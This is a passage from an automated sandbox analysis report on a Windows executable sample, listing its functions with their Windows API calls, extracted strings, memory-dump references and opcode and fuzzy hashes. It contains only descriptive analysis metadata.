                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: 80ec9d718883dff5c7a8ff040809229b8a7fe0e21e38f2f59f61c7791190dc5c
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    Function 00E1E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: b7d6388a3f7dee9f3056a63097eb5c041b6c98ed0bdc8e1a0ae31b2633119440
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    Function 00E1E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: e5172f0ed88e13d81c8988ff256fc7c744694572fd70a7920fc2d9503281c12e
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    Function 00E09F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,00E0903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E09F0C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
                                                                                                    • Instruction ID: c165020775bf0390ac910c4682cd31dc9fb240d2b93b248547b10d5ea50c4bbd
                                                                                                    • Opcode Fuzzy Hash: cd4b2ab505be873e8e249cee81c53daf59005ed429b29687ae04149ef9debceb
                                                                                                    • Instruction Fuzzy Hash: 89A0113008800E8AAE002B32CA0880C3B20EB20BC030002A8A00ACA0A2CB2A880B8A00
                                                                                                    Function 00E1AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
                                                                                                    • Instruction ID: bf904c90a37a342e33e448849be7f85600575a6b0ddb3d0faaf768503f34cb64
                                                                                                    • Opcode Fuzzy Hash: 9d690511e471daac836db672f7f5c9365c5263e676397cc061cf79624cb3c740
                                                                                                    • Instruction Fuzzy Hash: D2A011302022008B82000B328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820AA00
                                                                                                    Function 00E09620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
                                                                                                    • Instruction ID: 3270c55f92402b4105fd1a4538bcd3fd6fc6380c4ff7244a2fc2d3165f1c7fc9
                                                                                                    • Opcode Fuzzy Hash: ed4950cf30c98a90068e0da1bd35cf613d173ebe6bac0956653e3b0fc9de4ebb
                                                                                                    • Instruction Fuzzy Hash: CEF082704C1B159FDB308E74E458B92B7E8AB12329F042B1ED0E6629E2D77269CD8A40

                                                                                                    Non-executed Functions

                                                                                                    Function 00E1C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E1C2B1
                                                                                                    • EndDialog.USER32(?,00000006), ref: 00E1C2C4
                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00E1C2E0
                                                                                                    • SetFocus.USER32(00000000), ref: 00E1C2E7
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E1C321
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E1C358
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E1C36E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E1C38C
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C39C
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C3B8
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C3D4
                                                                                                    • _swprintf.LIBCMT ref: 00E1C404
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E1C417
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E1C41E
                                                                                                    • _swprintf.LIBCMT ref: 00E1C477
                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E1C48A
                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E1C4A7
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E1C4C7
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C4D7
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C4F1
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C509
                                                                                                    • _swprintf.LIBCMT ref: 00E1C535
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E1C548
                                                                                                    • _swprintf.LIBCMT ref: 00E1C59C
                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E1C5AF
                                                                                                      • Part of subcall function 00E1AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
                                                                                                      • Part of subcall function 00E1AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                    • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                    • API String ID: 797121971-530609767
                                                                                                    • Opcode ID: 61b76a5b105888ad3dc68cd350b3f5863b516028199116c50ff31a692f2a57c6
                                                                                                    • Instruction ID: 14f4aa4abdb0ff0cb1e491cd64567cb88bce1272a20697bbb45b1312df671593
                                                                                                    • Opcode Fuzzy Hash: 61b76a5b105888ad3dc68cd350b3f5863b516028199116c50ff31a692f2a57c6
                                                                                                    • Instruction Fuzzy Hash: 8591C4B2148348BFD2219BB0DC49FFB7BECEB4A704F045819F745E2091D775AA488B62
                                                                                                    Function 00E06FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E06FAA
                                                                                                    • _wcslen.LIBCMT ref: 00E07013
                                                                                                    • _wcslen.LIBCMT ref: 00E07084
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                      • Part of subcall function 00E0A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1
                                                                                                      • Part of subcall function 00E0A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E07139
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E07155
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E07298
                                                                                                      • Part of subcall function 00E09DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
                                                                                                      • Part of subcall function 00E09DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70
                                                                                                      • Part of subcall function 00E09620: CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                    • Opcode ID: 60f6038df4e1292d37903a749d2a5f996f9b1d3ad0ed33b3f4f48465f92c39fd
                                                                                                    • Instruction ID: 57c45f559a649b27a2abf1536a8d9a35f4a0bbd9af8c28acbdb9cd4c9e11aab6
                                                                                                    • Opcode Fuzzy Hash: 60f6038df4e1292d37903a749d2a5f996f9b1d3ad0ed33b3f4f48465f92c39fd
                                                                                                    • Instruction Fuzzy Hash: C9C1D271D04248AAEB24DB74DC85FEEB7A8AF04304F00555AF996F71C2D774BAC88B61
                                                                                                    Function 00E2D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 62538bbcc372dbebf0983362f3c84e5f57694333fd78baae75a510c98ac25c71
                                                                                                    • Instruction ID: 13e5487168eaee4f4b037ed383dd0b1626fcfef004d40e51ac6622eef56fc1b2
                                                                                                    • Opcode Fuzzy Hash: 62538bbcc372dbebf0983362f3c84e5f57694333fd78baae75a510c98ac25c71
                                                                                                    • Instruction Fuzzy Hash: E8C21971E086388FDB29CE28AD407EAB7B5EB84305F1551EAD54EF7240E775AE818F40
                                                                                                    Function 00E032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog_swprintf
                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                    • API String ID: 146138363-3282847064
                                                                                                    • Opcode ID: 707e627d1e62e8b70eb0aedac28f84b336fce4dad4ee3a1b7e5fd718aabafd63
                                                                                                    • Instruction ID: d81dadca56cedc5e8af6e49c30ac0ec49dfb76311a36e19074c87fa240df252b
                                                                                                    • Opcode Fuzzy Hash: 707e627d1e62e8b70eb0aedac28f84b336fce4dad4ee3a1b7e5fd718aabafd63
                                                                                                    • Instruction Fuzzy Hash: 7F32B3715103849BDB18DF74C895AE93BE9AF14304F08557DFD8AAB2C2DB749AC9CB20
                                                                                                    Function 00E0286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E02874
                                                                                                    • _strlen.LIBCMT ref: 00E02E3F
